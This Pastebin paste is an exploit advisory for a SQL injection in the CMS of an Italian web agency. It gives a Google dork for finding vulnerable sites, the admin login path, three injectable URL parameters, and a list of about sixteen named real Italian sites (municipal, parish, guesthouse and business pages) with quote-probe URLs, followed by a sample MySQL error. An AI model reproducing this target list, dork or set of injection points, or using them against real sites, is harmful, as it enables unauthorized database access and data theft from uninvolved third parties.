KingSkrupellos

TharrosNet Italy Web Agency SQL Injection

Oct 6th, 2019
219
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.60 KB | None | 0 0
  1. ###################################################################
  2.  
  3. # Exploit Title : TharrosNet Italy Web Agency SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 07/10/2019
  7. # Vendor Homepage : tharrosnet.it
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Google Dorks : inurl:/modules.php?modulo=mkNews site:it
  12. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  13. Special Elements used in an SQL Command ('SQL Injection') ]
  14. CWE-79 [ Improper Neutralization of Input During
  15. Web Page Generation ('Cross-site Scripting') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ###################################################################
  21.  
  22. # Impact :
  23. ***********
  24. TharrosNet Italy Web Agency is prone to an SQL-injection
  25. vulnerability because it fails to sufficiently sanitize user-supplied data before using
  26. it in an SQL query. Exploiting this issue could allow an attacker to compromise the
  27. application, access or modify data, or exploit latent vulnerabilities in the underlying database.
  28. A remote attacker can send a specially crafted request to the vulnerable application and
  29. execute arbitrary SQL commands in application`s database. Further exploitation of this
  30. vulnerability may result in unauthorized data manipulation.
  31. An attacker can exploit this issue using a browser or with any SQL Injector Tool.
  32.  
  33. ###################################################################
  34.  
  35. # Administrator Panel Login Path :
  36. *******************************
  37. /admin.php
  38.  
  39. # SQL Injection Exploit :
  40. **********************
  41. /modules.php?modulo=mkNews&idcat=[SQL Injection]
  42.  
  43. /modules.php?modulo=mkPhotos&catid=[SQL Injection]
  44.  
  45. /modules.php?modulo=mkNews&file=archive&catid=[SQL Injection]
  46.  
  47. ###################################################################
  48.  
  49. # Example Vulnerable Sites :
  50. *************************
  51. [+] comune.sannicolodarcidano.or.it/modules.php?modulo=mkNews&idcat=1%27
  52.  
  53. [+] sacottilla.it/modules.php?modulo=mkNews&file=archive&catid=116%27
  54.  
  55. [+] lavoroautonomo.it/modules.php?modulo=mkNews&idcat=1%27
  56.  
  57. [+] delcomar.it/modules.php?modulo=mkNews&idcat=1%27
  58.  
  59. [+] araform.it/modules.php?modulo=mkNews&idcat=1%27
  60.  
  61. [+] gioiaguesthouse.it/modules.php?modulo=mkNews&idcat=1%27
  62.  
  63. [+] rotarymonteprama.org/modules.php?modulo=mkNews&idcat=1%27
  64.  
  65. [+] fourroomsguesthouse.it/modules.php?modulo=mkNews&idcat=1%27
  66.  
  67. [+] parrocchiemarrubiu.it/modules.php?modulo=mkNews&idcat=1%27
  68.  
  69. [+] sardaffumicati.com/modules.php?modulo=mkNews&idcat=1%27
  70.  
  71. [+] aipdoristano.it/modules.php?modulo=mkNews&idcat=1%27
  72.  
  73. [+] pianuradelmaestrale.it/modules.php?modulo=mkNews&idcat=1%27
  74.  
  75. [+] unionevalletirsogrighine.it/modules.php?modulo=mkNews&idcat=1%27
  76.  
  77. [+] bbsapintadera.it/modules.php?modulo=mkNews&idcat=1%27
  78.  
  79. [+] campinglinibari.com/modules.php?modulo=mkNews&idcat=1%27
  80.  
  81. [+] sangiuseppelavoratore-or.it/modules.php?modulo=mkNews&idcat=1%27
  82.  
  83. ###################################################################
  84.  
  85. # Example SQL Database Error :
  86. ****************************
  87. Errore MySQL 1064: You have an error in your SQL syntax; check the manual that
  88. corresponds to your MySQL server version for the right syntax to use near 'AND
  89. visible = 1 ORDER BY ordine, datacreazione' at line 1
  90.  
  91. ###################################################################
  92.  
  93. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  94.  
  95. ###################################################################
Add Comment
Please, Sign In to add comment